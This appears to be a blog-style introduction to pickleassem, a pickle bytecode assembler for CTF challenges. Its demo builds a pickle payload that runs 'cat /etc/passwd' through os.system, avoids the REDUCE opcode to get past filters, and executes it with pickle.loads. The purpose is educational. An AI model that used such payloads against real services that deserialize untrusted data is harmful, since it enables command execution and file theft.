A Handy Tool for CTF Challenges

Simplifying Pickle Bytecode with Pickleassem: A Handy Tool for CTF Challenges

CTF (Capture The Flag) challenges often involve complex tasks that require manipulating and exploiting different technologies and vulnerabilities. One common challenge in CTFs involves pickle objects, which are serialized Python objects often used for data transfer and persistence. Handcrafting pickle bytecode is a tedious task that requires deep understanding of the pickle protocol and its opcodes. But fear not, because Pickleassem is here to simplify the process and make your life easier.

What is Pickleassem?

Pickleassem is a simple pickle assembler designed to make handcrafting pickle bytecode a breeze. Developed by gousaiyang, it provides a Python library that makes it easy to create custom pickle objects with minimal effort.

Features and Functionalities

Pickleassem offers a range of features to simplify pickle bytecode creation. Here are some of its key functionalities:

1. Push, Build, Pop, and Memo: Pickleassem provides methods that correspond to different pickle opcodes, such as push, build, pop, and memo. These functions allow you to easily push data onto the pickle stack, build arbitrary class instances, and pop values off the stack as needed.

2. Raw Opcodes: The library also offers the append_raw method, which allows you to insert arbitrary raw opcodes into the bytecode. This flexibility gives you full control over the serialization process.

3. Higher-Level Utility Functions: Pickleassem includes utility functions that simplify common tasks. For example, the util_push function allows you to push Python objects onto the stack using a more convenient syntax.

A Demo to Showcase its Functionality

To illustrate how Pickleassem works, let’s take a look at a demo:

python
import pickle
import pickletools

from pickleassem import PickleAssembler

pa = PickleAssembler(proto=4)
pa.push_mark()
pa.util_push('cat /etc/passwd')
pa.build_inst('os', 'system')
payload = pa.assemble()
assert b'R' not in payload
print(payload)
pickletools.dis(payload, annotate=1)
pickle.loads(payload)

In the above example, we import the necessary libraries and create an instance of PickleAssembler. We then push a marker onto the stack, followed by pushing the command 'cat /etc/passwd' using the util_push method. Next, we build an instance of the os.system class using the build_inst method. Finally, we assemble the payload and demonstrate how the bytecode can be disassembled and loaded using the pickletools and pickle libraries, respectively.

Documentation and Usage

To get started with Pickleassem, simply install it using pip:

bash
pip install -U pickleassem

For detailed usage information, refer to the accompanying source code. Each method of PickleAssembler follows the naming convention of corresponding to a specific pickle opcode. Methods starting with push, build, pop, or memo are used to perform stack operations. Additionally, append_raw allows for the insertion of raw opcodes.

Please note that not all opcodes and corresponding features are implemented in Pickleassem. The library does not support PERSID, BINPERSID, EXT1, EXT2, EXT4, FRAME, NEXT_BUFFER, or READONLY_BUFFER.

See Also

If you’re interested in other tools for pickle exploitation, check out these resources:

• anapickle: This tool provides a thorough analysis of pickles and their vulnerabilities. You can find more information in their slides and repository.

• pwnypack.pickle: Another useful tool for working with pickles, provided by the pwnypack library.

Pickleassem offers a unique and user-friendly approach to handcrafting pickle bytecode, making it an essential tool for CTF challenges. Whether you’re a beginner or an experienced CTF enthusiast, this library simplifies the process, allowing you to focus on solving the challenge at hand. Give Pickleassem a try and elevate your CTF game to new heights!

Source: https://github.com/gousaiyang/pickleassem/raw/master/README.md